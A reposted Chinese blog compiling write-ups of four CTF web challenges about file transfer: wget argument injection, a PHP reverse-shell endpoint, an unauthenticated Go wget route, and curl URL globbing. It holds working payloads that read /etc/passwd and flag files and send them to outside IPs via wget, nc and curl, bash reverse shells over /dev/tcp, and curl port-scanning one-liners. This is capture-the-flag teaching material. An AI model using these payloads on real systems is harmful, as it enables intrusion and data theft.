四个有关文件传输的CTF WEB题(深育杯FakeWget极客大挑战where_is_my_FUMO2021陇原战疫CheckINN1CTF-curl trick)
Posted Ocean:)
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了四个有关文件传输的CTF WEB题(深育杯FakeWget极客大挑战where_is_my_FUMO2021陇原战疫CheckINN1CTF-curl trick)相关的知识,希望对你有一定的参考价值。
wp来自官方发布和个人想法,觉得这四个题挺有意思的所以整理了下
深育杯FakeWget
题目只有三个路由,一个输入点,容易判断考点是命令注入,因此需要先不断测试传入数据并刷新观察回显,来猜测后端与wget命令拼接逻辑和过滤逻辑,下面是三个比较典型的fuzz示例:
www.baidu.com
teststr with space www.baidu.com这里fuzz出空格不可用
ls;\\nwww.baidu.com
这里fuzz出分号不可用,同理可得反引号,|,;,&
均被过滤,同时能够测试出可利用\\n
绕过正则检查,只需要构造出空格且领用wget命令即可
第一步测试出可利用\\n绕过合法性检查,且特殊符号被替换成空格,至此已经能够构造出POC读文件了,利用http_proxy
和--body-file
参数读取本地文件发送到代理服务器上:
-e;http_proxy=http://ip:port/;--method=POST;--body-file=/etc/passwd;\\nwww.baidu.com
这里特殊符号被替换成空格,\\n
绕过了检查wget的grep命令,并将/etc/passwd
的文件内容发送到代理机上。
接下来就是找flag文件,第三个路由(点击getflag)访问后看网站源码,可知flag文件名称是flag_is_here
建议的思路是:/etc/passwd
看到有ctf_user用户,读取ctf_user用户的.bash_history
得到flask程序的根目录是/home/ctf_user/basedirforwebapp/
,直接读文件/home/ctf_user/basedirforwebapp/flag_is_here
即可得到flag。
极客大挑战where_is_my_FUMO
打开题目,可以看到源码
<?php
function chijou_kega_no_junnka($str)
$black_list = [">", ";", "|", "", "", "/", " "];
return str_replace($black_list, "", $str);
if (isset($_GET['DATA']))
$data = $_GET['DATA'];
$addr = chijou_kega_no_junnka($data['ADDR']);
$port = chijou_kega_no_junnka($data['PORT']);
exec("bash -c \\"bash -i < /dev/tcp/$addr/$port\\"");
else
highlight_file(__FILE__);
可以通过数组传参,exec处可以反弹shell
http://1.14.102.22:8115/?DATA[ADDR]=IP&DATA[PORT]=port
这样就可以把shell反弹到对应的ip端口
再vps监听对应端口即可
nc -lvvp 9999
但是因为题目中,bash反弹shell写法,只能将命令从攻击机传到受害着,命令可以执行但是没有回显
bash -i < /dev/tcp/$addr/$port
拿到无回显shell之后也就有两种方法,第一种就是再反弹可回显交互式shell 到vps的其他端口
bash -i >& /dev/tcp/ip/6666 0>&1
监听端口,拿到shell,发现根目录flag.png
发现权限为www-data,而主机内文件权限都为root,也就是只能查看文件,写不了shell了
cat flag.png | base64
很多内容,将得到的base编码再解码得到图片
第二种方法
比较简单,需要了解bash反弹shell的原理
/dev/tcp|udp/ip/port 这个文件是特别特殊的,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的
但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信
直接把flag.png传过来就完了
vps监听6666端口将接收文件保存
nc -lvvp 6666 > /var/test.png
最后得到图片,即flag
还有一种做法
反弹shell后的文件获取
内置环境有 curl ,可以将图片外带到自己的服务器,或者暂存服务上。
curl bashupload.com -T /flag.png
2021陇原战疫CheckIN
一道Go的代码审计,大致扫一遍应该就知道了,/wget是利用到,但是似乎鉴权没有做:
router.GET("/wget", getController)
func getController(c *gin.Context)
cmd := exec.Command("/bin/wget", c.QueryArray("argv")[1:]...)
err := cmd.Run()
if err != nil
fmt.Println("error: ", err)
c.String(http.StatusOK, "Nothing")
直接能执行命令了,拿wget把flag带出来即可:
/wget?argv=1&argv=--post-file&argv=/flag&argv=http://121.5.169.223:39876/
root@VM-0-6-ubuntu:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from 117.21.200.166 37526 received!
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 121.5.169.223:39876
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
flag88729834-1693-4af8-abba-0ebf6bd84ec2
N1CTF-curl trick
题目的curl的url参数可控,并且题目说明了提示放在 /hint.txt 里面,所以第一反应就是用file协议去读 hint.txt ,但是有如下过滤:$blacklist = "/l|g|[\\x01-\\x1f]|[\\x7f-\\xff]|['\\"]/i";
,file的 l 被ban了
所以这里就要涉及到curl对url的一些处理,当curl遇到url中包含 和 [ 时,该url就会被特殊处理:https://github.com/curl/curl/blob/master/src/tool_urlglob.c#L360
[ 的相关操作由 glob_range 进行处理, 由 glob_set 进行处理,看注释就能大概知道这2个函数的基本处理逻辑
glob_range
/* processes a range expression with the point behind the opening '['
- char range: e.g. "a-z]", "B-Q]"
- num range: e.g. "0-9]", "17-2000]"
- num range with leading zeros: e.g. "001-999]"
expression is checked for well-formedness and collected until the next ']'
*/
glob_set
/* processes a set expression with the point behind the opening ''
','-separated elements are collected until the next closing ''
*/
举个例子:'fi[k-m]e:///etc/passwd'
会解析成3个url
fike:///etc/passwd
file:///etc/passwd
fime:///etc/passwd
'f,gile:///etc/passwd'
会解析成2个url:
file:///etc/passwd
gile:///etc/passwd
通过这个trick我们可以衍生出一些curl奇技淫巧,比如主机扫描、端口扫描等等:
curl 'http://127.0.0.1:80,8080,8000/' # 扫描特定端口
curl 'http://127.0.0.1:[80-1000]/' # 扫描某个范围的端口
curl 'http://172.27.190.[1-254]:80' # 扫描C段的80端口
curl 'http://172.27.190.[1-254]:80,8080' # 扫描C段的80和8080端口
...
PS:需要注意的是 和 [] 是可以出现在url任何位置的,包括get参数如果不url编码的话也会被curl特殊处理
Gopher协议攻击内网的SQL Server
写了个构造 TDS 协议的脚本:https://github.com/hack2fun/gopher_attack_mssql,不过后面看了老外的 wp 之后才发现 impacket 早已封装好了 TDS 协议,之前一直没注意
以上是关于四个有关文件传输的CTF WEB题(深育杯FakeWget极客大挑战where_is_my_FUMO2021陇原战疫CheckINN1CTF-curl trick)的主要内容,如果未能解决你的问题,请参考以下文章
SangFor(深育杯)-Reverse(逆向) Press Write up
Buuctf-Reverse(逆向) [RoarCTF2019]Polyre && SangFor(深育杯)-Reverse(逆向) XOR_Exercise Write up(代码片